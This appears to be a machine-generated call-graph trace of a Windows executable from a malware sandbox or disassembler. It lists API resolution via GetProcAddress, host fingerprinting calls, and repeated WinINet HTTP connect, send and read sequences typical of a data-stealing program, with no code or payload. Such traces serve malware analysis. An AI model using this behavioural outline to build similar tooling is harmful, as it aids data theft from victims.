2 API calls 14044->14045 14046 933735 14045->14046 14047 9345c0 2 API calls 14046->14047 14048 93374e 14047->14048 14049 9345c0 2 API calls 14048->14049 14050 933767 14049->14050 14051 9345c0 2 API calls 14050->14051 14052 933780 14051->14052 14053 9345c0 2 API calls 14052->14053 14054 933799 14053->14054 14055 9345c0 2 API calls 14054->14055 14056 9337b2 14055->14056 14057 9345c0 2 API calls 14056->14057 14058 9337cb 14057->14058 14059 9345c0 2 API calls 14058->14059 14060 9337e4 14059->14060 14061 9345c0 2 API calls 14060->14061 14062 9337fd 14061->14062 14063 9345c0 2 API calls 14062->14063 14064 933816 14063->14064 14065 9345c0 2 API calls 14064->14065 14066 93382f 14065->14066 14067 9345c0 2 API calls 14066->14067 14068 933848 14067->14068 14069 9345c0 2 API calls 14068->14069 14070 933861 14069->14070 14071 9345c0 2 API calls 14070->14071 14072 93387a 14071->14072 14073 9345c0 2 API calls 14072->14073 14074 933893 14073->14074 14075 9345c0 2 API calls 14074->14075 14076 9338ac 14075->14076 14077 9345c0 2 API calls 14076->14077 14078 9338c5 14077->14078 14079 9345c0 2 API calls 14078->14079 14080 9338de 14079->14080 14081 9345c0 2 API calls 14080->14081 14082 9338f7 14081->14082 14083 9345c0 2 API calls 14082->14083 14084 933910 14083->14084 14085 9345c0 2 API calls 14084->14085 14086 933929 14085->14086 14087 9345c0 2 API calls 14086->14087 14088 933942 14087->14088 14089 9345c0 2 API calls 14088->14089 14090 93395b 14089->14090 14091 9345c0 2 API calls 14090->14091 14092 933974 14091->14092 14093 9345c0 2 API calls 14092->14093 14094 93398d 14093->14094 14095 9345c0 2 API calls 14094->14095 14096 9339a6 14095->14096 14097 9345c0 2 API calls 14096->14097 14098 9339bf 14097->14098 14099 9345c0 2 API calls 14098->14099 14100 9339d8 14099->14100 14101 9345c0 2 API calls 14100->14101 14102 9339f1 14101->14102 14103 9345c0 2 API calls 14102->14103 14104 933a0a 14103->14104 14105 9345c0 2 API calls 14104->14105 14106 933a23 14105->14106 14107 9345c0 2 API calls 14106->14107 14108 933a3c 14107->14108 14109 9345c0 2 API calls 14108->14109 14110 933a55 14109->14110 14111 9345c0 2 API calls 14110->14111 14112 933a6e 14111->14112 14113 9345c0 2 API calls 14112->14113 14114 933a87 14113->14114 14115 9345c0 2 API calls 14114->14115 14116 933aa0 14115->14116 14117 9345c0 2 API calls 14116->14117 14118 933ab9 14117->14118 14119 9345c0 2 API calls 14118->14119 14120 933ad2 14119->14120 14121 9345c0 2 API calls 14120->14121 14122 933aeb 14121->14122 14123 9345c0 2 API calls 14122->14123 14124 933b04 14123->14124 14125 9345c0 2 API calls 14124->14125 14126 933b1d 14125->14126 14127 9345c0 2 API calls 14126->14127 14128 933b36 14127->14128 14129 9345c0 2 API calls 14128->14129 14130 933b4f 14129->14130 14131 9345c0 2 API calls 14130->14131 14132 933b68 14131->14132 14133 9345c0 2 API calls 14132->14133 14134 933b81 14133->14134 14135 9345c0 2 API calls 14134->14135 14136 933b9a 14135->14136 14137 9345c0 2 API calls 14136->14137 14138 933bb3 14137->14138 14139 9345c0 2 API calls 14138->14139 14140 933bcc 14139->14140 14141 9345c0 2 API calls 14140->14141 14142 933be5 14141->14142 14143 9345c0 2 API calls 14142->14143 14144 933bfe 14143->14144 14145 9345c0 2 API calls 14144->14145 14146 933c17 14145->14146 14147 9345c0 2 API calls 14146->14147 14148 933c30 14147->14148 14149 9345c0 2 API calls 14148->14149 14150 933c49 14149->14150 14151 9345c0 2 API calls 14150->14151 14152 933c62 14151->14152 14153 9345c0 2 API calls 14152->14153 14154 933c7b 14153->14154 14155 9345c0 2 API calls 14154->14155 14156 933c94 14155->14156 14157 9345c0 2 API calls 14156->14157 14158 933cad 14157->14158 14159 9345c0 2 API calls 14158->14159 14160 933cc6 14159->14160 14161 9345c0 2 API calls 14160->14161 14162 933cdf 14161->14162 14163 9345c0 2 API calls 14162->14163 14164 933cf8 14163->14164 14165 9345c0 2 API calls 14164->14165 14166 933d11 14165->14166 14167 9345c0 2 API calls 14166->14167 14168 933d2a 14167->14168 14169 9345c0 2 API calls 14168->14169 14170 933d43 14169->14170 14171 9345c0 2 API calls 14170->14171 14172 933d5c 14171->14172 14173 9345c0 2 API calls 14172->14173 14174 933d75 14173->14174 14175 9345c0 2 API calls 14174->14175 14176 933d8e 14175->14176 14177 9345c0 2 API calls 14176->14177 14178 933da7 14177->14178 14179 9345c0 2 API calls 14178->14179 14180 933dc0 14179->14180 14181 9345c0 2 API calls 14180->14181 14182 933dd9 14181->14182 14183 9345c0 2 API calls 14182->14183 14184 933df2 14183->14184 14185 9345c0 2 API calls 14184->14185 14186 933e0b 14185->14186 14187 9345c0 2 API calls 14186->14187 14188 933e24 14187->14188 14189 9345c0 2 API calls 14188->14189 14190 933e3d 14189->14190 14191 9345c0 2 API calls 14190->14191 14192 933e56 14191->14192 14193 9345c0 2 API calls 14192->14193 14194 933e6f 14193->14194 14195 9345c0 2 API calls 14194->14195 14196 933e88 14195->14196 14197 9345c0 2 API calls 14196->14197 14198 933ea1 14197->14198 14199 9345c0 2 API calls 14198->14199 14200 933eba 14199->14200 14201 9345c0 2 API calls 14200->14201 14202 933ed3 14201->14202 14203 9345c0 2 API calls 14202->14203 14204 933eec 14203->14204 14205 9345c0 2 API calls 14204->14205 14206 933f05 14205->14206 14207 9345c0 2 API calls 14206->14207 14208 933f1e 14207->14208 14209 9345c0 2 API calls 14208->14209 14210 933f37 14209->14210 14211 9345c0 2 API calls 14210->14211 14212 933f50 14211->14212 14213 9345c0 2 API calls 14212->14213 14214 933f69 14213->14214 14215 9345c0 2 API calls 14214->14215 14216 933f82 14215->14216 14217 9345c0 2 API calls 14216->14217 14218 933f9b 14217->14218 14219 9345c0 2 API calls 14218->14219 14220 933fb4 14219->14220 14221 9345c0 2 API calls 14220->14221 14222 933fcd 14221->14222 14223 9345c0 2 API calls 14222->14223 14224 933fe6 14223->14224 14225 9345c0 2 API calls 14224->14225 14226 933fff 14225->14226 14227 9345c0 2 API calls 14226->14227 14228 934018 14227->14228 14229 9345c0 2 API calls 14228->14229 14230 934031 14229->14230 14231 9345c0 2 API calls 14230->14231 14232 93404a 14231->14232 14233 9345c0 2 API calls 14232->14233 14234 934063 14233->14234 14235 9345c0 2 API calls 14234->14235 14236 93407c 14235->14236 14237 9345c0 2 API calls 14236->14237 14238 934095 14237->14238 14239 9345c0 2 API calls 14238->14239 14240 9340ae 14239->14240 14241 9345c0 2 API calls 14240->14241 14242 9340c7 14241->14242 14243 9345c0 2 API calls 14242->14243 14244 9340e0 14243->14244 14245 9345c0 2 API calls 14244->14245 14246 9340f9 14245->14246 14247 9345c0 2 API calls 14246->14247 14248 934112 14247->14248 14249 9345c0 2 API calls 14248->14249 14250 93412b 14249->14250 14251 9345c0 2 API calls 14250->14251 14252 934144 14251->14252 14253 9345c0 2 API calls 14252->14253 14254 93415d 14253->14254 14255 9345c0 2 API calls 14254->14255 14256 934176 14255->14256 14257 9345c0 2 API calls 14256->14257 14258 93418f 14257->14258 14259 9345c0 2 API calls 14258->14259 14260 9341a8 14259->14260 14261 9345c0 2 API calls 14260->14261 14262 9341c1 14261->14262 14263 9345c0 2 API calls 14262->14263 14264 9341da 14263->14264 14265 9345c0 2 API calls 14264->14265 14266 9341f3 14265->14266 14267 9345c0 2 API calls 14266->14267 14268 93420c 14267->14268 14269 9345c0 2 API calls 14268->14269 14270 934225 14269->14270 14271 9345c0 2 API calls 14270->14271 14272 93423e 14271->14272 14273 9345c0 2 API calls 14272->14273 14274 934257 14273->14274 14275 9345c0 2 API calls 14274->14275 14276 934270 14275->14276 14277 9345c0 2 API calls 14276->14277 14278 934289 14277->14278 14279 9345c0 2 API calls 14278->14279 14280 9342a2 14279->14280 14281 9345c0 2 API calls 14280->14281 14282 9342bb 14281->14282 14283 9345c0 2 API calls 14282->14283 14284 9342d4 14283->14284 14285 9345c0 2 API calls 14284->14285 14286 9342ed 14285->14286 14287 9345c0 2 API calls 14286->14287 14288 934306 14287->14288 14289 9345c0 2 API calls 14288->14289 14290 93431f 14289->14290 14291 9345c0 2 API calls 14290->14291 14292 934338 14291->14292 14293 9345c0 2 API calls 14292->14293 14294 934351 14293->14294 14295 9345c0 2 API calls 14294->14295 14296 93436a 14295->14296 14297 9345c0 2 API calls 14296->14297 14298 934383 14297->14298 14299 9345c0 2 API calls 14298->14299 14300 93439c 14299->14300 14301 9345c0 2 API calls 14300->14301 14302 9343b5 14301->14302 14303 9345c0 2 API calls 14302->14303 14304 9343ce 14303->14304 14305 9345c0 2 API calls 14304->14305 14306 9343e7 14305->14306 14307 9345c0 2 API calls 14306->14307 14308 934400 14307->14308 14309 9345c0 2 API calls 14308->14309 14310 934419 14309->14310 14311 9345c0 2 API calls 14310->14311 14312 934432 14311->14312 14313 9345c0 2 API calls 14312->14313 14314 93444b 14313->14314 14315 9345c0 2 API calls 14314->14315 14316 934464 14315->14316 14317 9345c0 2 API calls 14316->14317 14318 93447d 14317->14318 14319 9345c0 2 API calls 14318->14319 14320 934496 14319->14320 14321 9345c0 2 API calls 14320->14321 14322 9344af 14321->14322 14323 9345c0 2 API calls 14322->14323 14324 9344c8 14323->14324 14325 9345c0 2 API calls 14324->14325 14326 9344e1 14325->14326 14327 9345c0 2 API calls 14326->14327 14328 9344fa 14327->14328 14329 9345c0 2 API calls 14328->14329 14330 934513 14329->14330 14331 9345c0 2 API calls 14330->14331 14332 93452c 14331->14332 14333 9345c0 2 API calls 14332->14333 14334 934545 14333->14334 14335 9345c0 2 API calls 14334->14335 14336 93455e 14335->14336 14337 9345c0 2 API calls 14336->14337 14338 934577 14337->14338 14339 9345c0 2 API calls 14338->14339 14340 934590 14339->14340 14341 9345c0 2 API calls 14340->14341 14342 9345a9 14341->14342 14343 949c10 14342->14343 14344 94a036 8 API calls 14343->14344 14345 949c20 43 API calls 14343->14345 14346 94a146 14344->14346 14347 94a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14344->14347 14345->14344 14348 94a216 14346->14348 14349 94a153 8 API calls 14346->14349 14347->14346 14350 94a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14348->14350 14351 94a298 14348->14351 14349->14348 14350->14351 14352 94a2a5 6 API calls 14351->14352 14353 94a337 14351->14353 14352->14353 14354 94a344 9 API calls 14353->14354 14355 94a41f 14353->14355 14354->14355 14356 94a4a2 14355->14356 14357 94a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14355->14357 14358 94a4dc 14356->14358 14359 94a4ab GetProcAddress GetProcAddress 14356->14359 14357->14356 14360 94a515 14358->14360 14361 94a4e5 GetProcAddress GetProcAddress 14358->14361 14359->14358 14362 94a612 14360->14362 14363 94a522 10 API calls 14360->14363 14361->14360 14364 94a67d 14362->14364 14365 94a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14362->14365 14363->14362 14366 94a686 GetProcAddress 14364->14366 14367 94a69e 14364->14367 14365->14364 14366->14367 14368 94a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14367->14368 14369 945ca3 14367->14369 14368->14369 14370 931590 14369->14370 15492 931670 14370->15492 14373 94a7a0 lstrcpy 14374 9315b5 14373->14374 14375 94a7a0 lstrcpy 14374->14375 14376 9315c7 14375->14376 14377 94a7a0 lstrcpy 14376->14377 14378 9315d9 14377->14378 14379 94a7a0 lstrcpy 14378->14379 14380 931663 14379->14380 14381 945510 14380->14381 14382 945521 14381->14382 14383 94a820 2 API calls 14382->14383 14384 94552e 14383->14384 14385 94a820 2 API calls 14384->14385 14386 94553b 14385->14386 14387 94a820 2 API calls 14386->14387 14388 945548 14387->14388 14389 94a740 lstrcpy 14388->14389 14390 945555 14389->14390 14391 94a740 lstrcpy 14390->14391 14392 945562 14391->14392 14393 94a740 lstrcpy 14392->14393 14394 94556f 14393->14394 14395 94a740 lstrcpy 14394->14395 14400 94557c 14395->14400 14396 94a740 lstrcpy 14396->14400 14397 945643 StrCmpCA 14397->14400 14398 9456a0 StrCmpCA 14399 9457dc 14398->14399 14398->14400 14401 94a8a0 lstrcpy 14399->14401 14400->14396 14400->14397 14400->14398 14403 94a820 lstrlen lstrcpy 14400->14403 14406 945856 StrCmpCA 14400->14406 14411 931590 lstrcpy 14400->14411 14415 945a0b StrCmpCA 14400->14415 14416 9452c0 25 API calls 14400->14416 14429 94a8a0 lstrcpy 14400->14429 14430 94578a StrCmpCA 14400->14430 14432 94a7a0 lstrcpy 14400->14432 14433 94593f StrCmpCA 14400->14433 14434 9451f0 20 API calls 14400->14434 14402 9457e8 14401->14402 14404 94a820 2 API calls 14402->14404 14403->14400 14405 9457f6 14404->14405 14408 94a820 2 API calls 14405->14408 14406->14400 14407 945991 14406->14407 14409 94a8a0 lstrcpy 14407->14409 14410 945805 14408->14410 14412 94599d 14409->14412 14413 931670 lstrcpy 14410->14413 14411->14400 14414 94a820 2 API calls 14412->14414 14435 945811 14413->14435 14417 9459ab 14414->14417 14418 945a16 Sleep 14415->14418 14419 945a28 14415->14419 14416->14400 14420 94a820 2 API calls 14417->14420 14418->14400 14421 94a8a0 lstrcpy 14419->14421 14422 9459ba 14420->14422 14424 945a34 14421->14424 14423 931670 lstrcpy 14422->14423 14423->14435 14425 94a820 2 API calls 14424->14425 14426 945a43 14425->14426 14427 94a820 2 API calls 14426->14427 14428 945a52 14427->14428 14431 931670 lstrcpy 14428->14431 14429->14400 14430->14400 14431->14435 14432->14400 14433->14400 14434->14400 14435->13488 14437 947553 GetVolumeInformationA 14436->14437 14438 94754c 14436->14438 14440 947591 14437->14440 14438->14437 14439 9475fc GetProcessHeap RtlAllocateHeap 14441 947628 wsprintfA 14439->14441 14442 947619 14439->14442 14440->14439 14444 94a740 lstrcpy 14441->14444 14443 94a740 lstrcpy 14442->14443 14445 945da7 14443->14445 14444->14445 14445->13509 14447 94a7a0 lstrcpy 14446->14447 14448 934899 14447->14448 15501 9347b0 14448->15501 14450 9348a5 14451 94a740 lstrcpy 14450->14451 14452 9348d7 14451->14452 14453 94a740 lstrcpy 14452->14453 14454 9348e4 14453->14454 14455 94a740 lstrcpy 14454->14455 14456 9348f1 14455->14456 14457 94a740 lstrcpy 14456->14457 14458 9348fe 14457->14458 14459 94a740 lstrcpy 14458->14459 14460 93490b InternetOpenA StrCmpCA 14459->14460 14461 934944 14460->14461 14462 934955 14461->14462 14463 934ecb InternetCloseHandle 14461->14463 15512 948b60 14462->15512 14464 934ee8 14463->14464 15507 939ac0 CryptStringToBinaryA 14464->15507 14466 934963 15520 94a920 14466->15520 14469 934976 14471 94a8a0 lstrcpy 14469->14471 14476 93497f 14471->14476 14472 94a820 2 API calls 14473 934f05 14472->14473 14475 94a9b0 4 API calls 14473->14475 14474 934f27 ctype 14478 94a7a0 lstrcpy 14474->14478 14477 934f1b 14475->14477 14480 94a9b0 4 API calls 14476->14480 14479 94a8a0 lstrcpy 14477->14479 14491 934f57 14478->14491 14479->14474 14481 9349a9 14480->14481 14482 94a8a0 lstrcpy 14481->14482 14483 9349b2 14482->14483 14484 94a9b0 4 API calls 14483->14484 14485 9349d1 14484->14485 14486 94a8a0 lstrcpy 14485->14486 14487 9349da 14486->14487 14488 94a920 3 API calls 14487->14488 14489 9349f8 14488->14489 14490 94a8a0 lstrcpy 14489->14490 14492 934a01 14490->14492 14491->13512 14493 94a9b0 4 API calls 14492->14493 14494 934a20 14493->14494 14495 94a8a0 lstrcpy 14494->14495 14496 934a29 14495->14496 14497 94a9b0 4 API calls 14496->14497 14498 934a48 14497->14498 14499 94a8a0 lstrcpy 14498->14499 14500 934a51 14499->14500 14501 94a9b0 4 API calls 14500->14501 14502 934a7d 14501->14502 14503 94a920 3 API calls 14502->14503 14504 934a84 14503->14504 14505 94a8a0 lstrcpy 14504->14505 14506 934a8d 14505->14506 14507 934aa3 InternetConnectA 14506->14507 14507->14463 14508 934ad3 HttpOpenRequestA 14507->14508 14510 934b28 14508->14510 14511 934ebe InternetCloseHandle 14508->14511 14512 94a9b0 4 API calls 14510->14512 14511->14463 14513 934b3c 14512->14513 14514 94a8a0 lstrcpy 14513->14514 14515 934b45 14514->14515 14516 94a920 3 API calls 14515->14516 14517 934b63 14516->14517 14518 94a8a0 lstrcpy 14517->14518 14519 934b6c 14518->14519 14520 94a9b0 4 API calls 14519->14520 14521 934b8b 14520->14521 14522 94a8a0 lstrcpy 14521->14522 14523 934b94 14522->14523 14524 94a9b0 4 API calls 14523->14524 14525 934bb5 14524->14525 14526 94a8a0 lstrcpy 14525->14526 14527 934bbe 14526->14527 14528 94a9b0 4 API calls 14527->14528 14529 934bde 14528->14529 14530 94a8a0 lstrcpy 14529->14530 14531 934be7 14530->14531 14532 94a9b0 4 API calls 14531->14532 14533 934c06 14532->14533 14534 94a8a0 lstrcpy 14533->14534 14535 934c0f 14534->14535 14536 94a920 3 API calls 14535->14536 14537 934c2d 14536->14537 14538 94a8a0 lstrcpy 14537->14538 14539 934c36 14538->14539 14540 94a9b0 4 API calls 14539->14540 14541 934c55 14540->14541 14542 94a8a0 lstrcpy 14541->14542 14543 934c5e 14542->14543 14544 94a9b0 4 API calls 14543->14544 14545 934c7d 14544->14545 14546 94a8a0 lstrcpy 14545->14546 14547 934c86 14546->14547 14548 94a920 3 API calls 14547->14548 14549 934ca4 14548->14549 14550 94a8a0 lstrcpy 14549->14550 14551 934cad 14550->14551 14552 94a9b0 4 API calls 14551->14552 14553 934ccc 14552->14553 14554 94a8a0 lstrcpy 14553->14554 14555 934cd5 14554->14555 14556 94a9b0 4 API calls 14555->14556 14557 934cf6 14556->14557 14558 94a8a0 lstrcpy 14557->14558 14559 934cff 14558->14559 14560 94a9b0 4 API calls 14559->14560 14561 934d1f 14560->14561 14562 94a8a0 lstrcpy 14561->14562 14563 934d28 14562->14563 14564 94a9b0 4 API calls 14563->14564 14565 934d47 14564->14565 14566 94a8a0 lstrcpy 14565->14566 14567 934d50 14566->14567 14568 94a920 3 API calls 14567->14568 14569 934d6e 14568->14569 14570 94a8a0 lstrcpy 14569->14570 14571 934d77 14570->14571 14572 94a740 lstrcpy 14571->14572 14573 934d92 14572->14573 14574 94a920 3 API calls 14573->14574 14575 934db3 14574->14575 14576 94a920 3 API calls 14575->14576 14577 934dba 14576->14577 14578 94a8a0 lstrcpy 14577->14578 14579 934dc6 14578->14579 14580 934de7 lstrlen 14579->14580 14581 934dfa 14580->14581 14582 934e03 lstrlen 14581->14582 15526 94aad0 14582->15526 14584 934e13 HttpSendRequestA 14585 934e32 InternetReadFile 14584->14585 14586 934e67 InternetCloseHandle 14585->14586 14591 934e5e 14585->14591 14589 94a800 14586->14589 14588 94a9b0 4 API calls 14588->14591 14589->14511 14590 94a8a0 lstrcpy 14590->14591 14591->14585 14591->14586 14591->14588 14591->14590 15528 94aad0 14592->15528 14594 9417c4 StrCmpCA 14595 9417d7 14594->14595 14596 9417cf ExitProcess 14594->14596 14597 9419c2 14595->14597 14598 941970 StrCmpCA 14595->14598 14599 9418f1 StrCmpCA 14595->14599 14600 941951 StrCmpCA 14595->14600 14601 941932 StrCmpCA 14595->14601 14602 941913 StrCmpCA 14595->14602 14603 94185d StrCmpCA 14595->14603 14604 94187f StrCmpCA 14595->14604 14605 9418ad StrCmpCA 14595->14605 14606 9418cf StrCmpCA 14595->14606 14607 94a820 lstrlen lstrcpy 14595->14607 14597->13514 14598->14595 14599->14595 14600->14595 14601->14595 14602->14595 14603->14595 14604->14595 14605->14595 14606->14595 14607->14595 14609 94a7a0 lstrcpy 14608->14609 14610 935979 14609->14610 14611 9347b0 2 API calls 14610->14611 14612 935985 14611->14612 14613 94a740 lstrcpy 14612->14613 14614 9359ba 14613->14614 14615 94a740 lstrcpy 14614->14615 14616 9359c7 14615->14616 14617 94a740 lstrcpy 14616->14617 14618 9359d4 14617->14618 14619 94a740 lstrcpy 14618->14619 14620 9359e1 14619->14620 14621 94a740 lstrcpy 14620->14621 14622 9359ee InternetOpenA StrCmpCA 14621->14622 14623 935a1d 14622->14623 14624 935fc3 InternetCloseHandle 14623->14624 14625 948b60 3 API calls 14623->14625 14626 935fe0 14624->14626 14627 935a3c 14625->14627 14629 939ac0 4 API calls 14626->14629 14628 94a920 3 API calls 14627->14628 14630 935a4f 14628->14630 14631 935fe6 14629->14631 14632 94a8a0 lstrcpy 14630->14632 14633 94a820 2 API calls 14631->14633 14635 93601f ctype 14631->14635 14637 935a58 14632->14637 14634 935ffd 14633->14634 14636 94a9b0 4 API calls 14634->14636 14639 94a7a0 lstrcpy 14635->14639 14638 936013 14636->14638 14641 94a9b0 4 API calls 14637->14641 14640 94a8a0 lstrcpy 14638->14640 14649 93604f 14639->14649 14640->14635 14642 935a82 14641->14642 14643 94a8a0 lstrcpy 14642->14643 14644 935a8b 14643->14644 14645 94a9b0 4 API calls 14644->14645 14646 935aaa 14645->14646 14647 94a8a0 lstrcpy 14646->14647 14648 935ab3 14647->14648 14650 94a920 3 API calls 14648->14650 14649->13520 14651 935ad1 14650->14651 14652 94a8a0 lstrcpy 14651->14652 14653 935ada 14652->14653 14654 94a9b0 4 API calls 14653->14654 14655 935af9 14654->14655 14656 94a8a0 lstrcpy 14655->14656 14657 935b02 14656->14657 14658 94a9b0 4 API calls 14657->14658 14659 935b21 14658->14659 14660 94a8a0 lstrcpy 14659->14660 14661 935b2a 14660->14661 14662 94a9b0 4 API calls 14661->14662 14663 935b56 14662->14663 14664 94a920 3 API calls 14663->14664 14665 935b5d 14664->14665 14666 94a8a0 lstrcpy 14665->14666 14667 935b66 14666->14667 14668 935b7c InternetConnectA 14667->14668 14668->14624 14669 935bac HttpOpenRequestA 14668->14669 14671 935fb6 InternetCloseHandle 14669->14671 14672 935c0b 14669->14672 14671->14624 14673 94a9b0 4 API calls 14672->14673 14674 935c1f 14673->14674 14675 94a8a0 lstrcpy 14674->14675 14676 935c28 14675->14676 14677 94a920 3 API calls 14676->14677 14678 935c46 14677->14678 14679 94a8a0 lstrcpy 14678->14679 14680 935c4f 14679->14680 14681 94a9b0 4 API calls 14680->14681 14682 935c6e 14681->14682 14683 94a8a0 lstrcpy 14682->14683 14684 935c77 14683->14684 14685 94a9b0 4 API calls 14684->14685 14686 935c98 14685->14686 14687 94a8a0 lstrcpy 14686->14687 14688 935ca1 14687->14688 14689 94a9b0 4 API calls 14688->14689 14690 935cc1 14689->14690 14691 94a8a0 lstrcpy 14690->14691 14692 935cca 14691->14692 14693 94a9b0 4 API calls 14692->14693 14694 935ce9 14693->14694 14695 94a8a0 lstrcpy 14694->14695 14696 935cf2 14695->14696 14697 94a920 3 API calls 14696->14697 14698 935d10 14697->14698 14699 94a8a0 lstrcpy 14698->14699 14700 935d19 14699->14700 14701 94a9b0 4 API calls 14700->14701 14702 935d38 14701->14702 14703 94a8a0 lstrcpy 14702->14703 14704 935d41 14703->14704 14705 94a9b0 4 API calls 14704->14705 14706 935d60 14705->14706 14707 94a8a0 lstrcpy 14706->14707 14708 935d69 14707->14708 14709 94a920 3 API calls 14708->14709 14710 935d87 14709->14710 14711 94a8a0 lstrcpy 14710->14711 14712 935d90 14711->14712 14713 94a9b0 4 API calls 14712->14713 14714 935daf 14713->14714 14715 94a8a0 lstrcpy 14714->14715 14716 935db8 14715->14716 14717 94a9b0 4 API calls 14716->14717 14718 935dd9 14717->14718 14719 94a8a0 lstrcpy 14718->14719 14720 935de2 14719->14720 14721 94a9b0 4 API calls 14720->14721 14722 935e02 14721->14722 14723 94a8a0 lstrcpy 14722->14723 14724 935e0b 14723->14724 14725 94a9b0 4 API calls 14724->14725 14726 935e2a 14725->14726 14727 94a8a0 lstrcpy 14726->14727 14728 935e33 14727->14728 14729 94a920 3 API calls 14728->14729 14730 935e54 14729->14730 14731 94a8a0 lstrcpy 14730->14731 14732 935e5d 14731->14732 14733 935e70 lstrlen 14732->14733 15529 94aad0 14733->15529 14735 935e81 lstrlen GetProcessHeap RtlAllocateHeap 15530 94aad0 14735->15530 14737 935eae lstrlen 14738 935ebe 14737->14738 14739 935ed7 lstrlen 14738->14739 14740 935ee7 14739->14740 14741 935ef0 lstrlen 14740->14741 14742 935f04 14741->14742 14743 935f1a lstrlen 14742->14743 15531 94aad0 14743->15531 14745 935f2a HttpSendRequestA 14746 935f35 InternetReadFile 14745->14746 14747 935f6a InternetCloseHandle 14746->14747 14751 935f61 14746->14751 14747->14671 14749 94a9b0 4 API calls 14749->14751 14750 94a8a0 lstrcpy 14750->14751 14751->14746 14751->14747 14751->14749 14751->14750 14753 941077 14752->14753 14754 941151 14753->14754 14755 94a820 lstrlen lstrcpy 14753->14755 14754->13522 14755->14753 14757 940db7 14756->14757 14758 940ea4 StrCmpCA 14757->14758 14759 940e27 StrCmpCA 14757->14759 14760 940e67 StrCmpCA 14757->14760 14761 940f17 14757->14761 14762 94a820 lstrlen lstrcpy 14757->14762 14758->14757 14759->14757 14760->14757 14761->13530 14762->14757 14766 940f67 14763->14766 14764 941044 14764->13538 14765 940fb2 StrCmpCA 14765->14766 14766->14764 14766->14765 14767 94a820 lstrlen lstrcpy 14766->14767 14767->14766 14769 94a740 lstrcpy 14768->14769 14770 941a26 14769->14770 14771 94a9b0 4 API calls 14770->14771 14772 941a37 14771->14772 14773 94a8a0 lstrcpy 14772->14773 14774 941a40 14773->14774 14775 94a9b0 4 API calls 14774->14775 14776 941a5b 14775->14776 14777 94a8a0 lstrcpy 14776->14777 14778 941a64 14777->14778 14779 94a9b0 4 API calls 14778->14779 14780 941a7d 14779->14780 14781 94a8a0 lstrcpy 14780->14781 14782 941a86 14781->14782 14783 94a9b0 4 API calls 14782->14783 14784 941aa1 14783->14784 14785 94a8a0 lstrcpy 14784->14785 14786 941aaa 14785->14786 14787 94a9b0 4 API calls 14786->14787 14788 941ac3 14787->14788 14789 94a8a0 lstrcpy 14788->14789 14790 941acc 14789->14790 14791 94a9b0 4 API calls 14790->14791 14792 941ae7 14791->14792 14793 94a8a0 lstrcpy 14792->14793 14794 941af0 14793->14794 14795 94a9b0 4 API calls 14794->14795 14796 941b09 14795->14796 14797 94a8a0 lstrcpy 14796->14797 14798 941b12 14797->14798 14799 94a9b0 4 API calls 14798->14799 14800 941b2d 14799->14800 14801 94a8a0 lstrcpy 14800->14801 14802 941b36 14801->14802 14803 94a9b0 4 API calls 14802->14803 14804 941b4f 14803->14804 14805 94a8a0 lstrcpy 14804->14805 14806 941b58 14805->14806 14807 94a9b0 4 API calls 14806->14807 14808 941b76 14807->14808 14809 94a8a0 lstrcpy 14808->14809 14810 941b7f 14809->14810 14811 947500 6 API calls 14810->14811 14812 941b96 14811->14812 14813 94a920 3 API calls 14812->14813 14814 941ba9 14813->14814 14815 94a8a0 lstrcpy 14814->14815 14816 941bb2 14815->14816 14817 94a9b0 4 API calls 14816->14817 14818 941bdc 14817->14818 14819 94a8a0 lstrcpy 14818->14819 14820 941be5 14819->14820 14821 94a9b0 4 API calls 14820->14821 14822 941c05 14821->14822 14823 94a8a0 lstrcpy 14822->14823 14824 941c0e 14823->14824 15532 947690 GetProcessHeap RtlAllocateHeap 14824->15532 14827 94a9b0 4 API calls 14828 941c2e 14827->14828 14829 94a8a0 lstrcpy 14828->14829 14830 941c37 14829->14830 14831 94a9b0 4 API calls 14830->14831 14832 941c56 14831->14832 14833 94a8a0 lstrcpy 14832->14833 14834 941c5f 14833->14834 14835 94a9b0 4 API calls 14834->14835 14836 941c80 14835->14836 14837 94a8a0 lstrcpy 14836->14837 14838 941c89 14837->14838 15539 9477c0 GetCurrentProcess IsWow64Process 14838->15539 14841 94a9b0 4 API calls 14842 941ca9 14841->14842 14843 94a8a0 lstrcpy 14842->14843 14844 941cb2 14843->14844 14845 94a9b0 4 API calls 14844->14845 14846 941cd1 14845->14846 14847 94a8a0 lstrcpy 14846->14847 14848 941cda 14847->14848 14849 94a9b0 4 API calls 14848->14849 14850 941cfb 14849->14850 14851 94a8a0 lstrcpy 14850->14851 14852 941d04 14851->14852 14853 947850 3 API calls 14852->14853 14854 941d14 14853->14854 14855 94a9b0 4 API calls 14854->14855 14856 941d24 14855->14856 14857 94a8a0 lstrcpy 14856->14857 14858 941d2d 14857->14858 14859 94a9b0 4 API calls 14858->14859 14860 941d4c 14859->14860 14861 94a8a0 lstrcpy 14860->14861 14862 941d55 14861->14862 14863 94a9b0 4 API calls 14862->14863 14864 941d75 14863->14864 14865 94a8a0 lstrcpy 14864->14865 14866 941d7e 14865->14866 14867 9478e0 3 API calls 14866->14867 14868 941d8e 14867->14868 14869 94a9b0 4 API calls 14868->14869 14870 941d9e 14869->14870 14871 94a8a0 lstrcpy 14870->14871 14872 941da7 14871->14872 14873 94a9b0 4 API calls 14872->14873 14874 941dc6 14873->14874 14875 94a8a0 lstrcpy 14874->14875 14876 941dcf 14875->14876 14877 94a9b0 4 API calls 14876->14877 14878 941df0 14877->14878 14879 94a8a0 lstrcpy 14878->14879 14880 941df9 14879->14880 15541 947980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14880->15541 14883 94a9b0 4 API calls 14884 941e19 14883->14884 14885 94a8a0 lstrcpy 14884->14885 14886 941e22 14885->14886 14887 94a9b0 4 API calls 14886->14887 14888 941e41 14887->14888 14889 94a8a0 lstrcpy 14888->14889 14890 941e4a 14889->14890 14891 94a9b0 4 API calls 14890->14891 14892 941e6b 14891->14892 14893 94a8a0 lstrcpy 14892->14893 14894 941e74 14893->14894 15543 947a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14894->15543 14897 94a9b0 4 API calls 14898 941e94 14897->14898 14899 94a8a0 lstrcpy 14898->14899 14900 941e9d 14899->14900 14901 94a9b0 4 API calls 14900->14901 14902 941ebc 14901->14902 14903 94a8a0 lstrcpy 14902->14903 